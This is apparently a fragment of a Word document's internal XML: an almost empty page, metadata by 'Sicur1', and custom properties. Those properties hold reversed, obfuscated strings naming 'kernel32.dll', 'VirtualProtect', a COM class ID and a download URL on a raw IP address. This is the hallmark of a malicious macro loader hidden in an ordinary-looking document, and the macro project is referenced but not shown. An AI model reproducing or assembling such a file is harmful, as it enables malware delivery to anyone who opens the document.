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5BC" w:rsidRDefault="00517FD1" w:rsidP="00517FD1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810500" cy="10160000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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101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17FD1" w:rsidRDefault="00517FD1" w:rsidP="00517FD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00517FD1" w:rsidRPr="00517FD1" w:rsidRDefault="00517FD1" w:rsidP="00517FD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00517FD1" w:rsidRPr="00517FD1" w:rsidSect="00517FD1">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="188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FD1"/>
    <w:rsid w:val="00517FD1"/>
    <w:rsid w:val="0062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HRktIVKeuQ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HRktIVKeuQ.bin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2</Lines>
  <Paragraphs>0</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>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Sicur1</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sicur1</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-16T14:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-16T14:42:00Z</dcterms:modified>
  <cp:category>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Q6EVWAqN">
    <vt:lpwstr>seitreporPtnemucoDnItliuB</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="AhizEqgWX">
    <vt:lpwstr>seitreporPtnemucoDmotsuC</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="dEvTxAESbc">
    <vt:lpwstr>&amp;</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="cklJOA9">
    <vt:lpwstr>H</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="WCu0fgdjCN">
    <vt:lpwstr>ynapmoC</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="xyIDzYmU93C">
    <vt:lpwstr>yrogetaC</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="lqfKkVhb2">
    <vt:lpwstr>lld.23lenrek</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="PUEJKi67Yd">
    <vt:lpwstr>tcetorPlautriV</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="KVQNJ2WxDpLI">
    <vt:lpwstr>}A97366DD3EE0-77E9-EBF4-7DD4-A2832FCF{</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="PvyiJ04t">
    <vt:lpwstr>/~~gHlWcIzoWAAsu8ga0E3WXIvh_e4lXx5cP9/~~Qrn86w3k2VqavI6639hOuhtplO4Cp_bUQR/aHpINVNLu5/722.641.8.54//:ptth</vt:lpwstr>
  </property>
</Properties>
</file>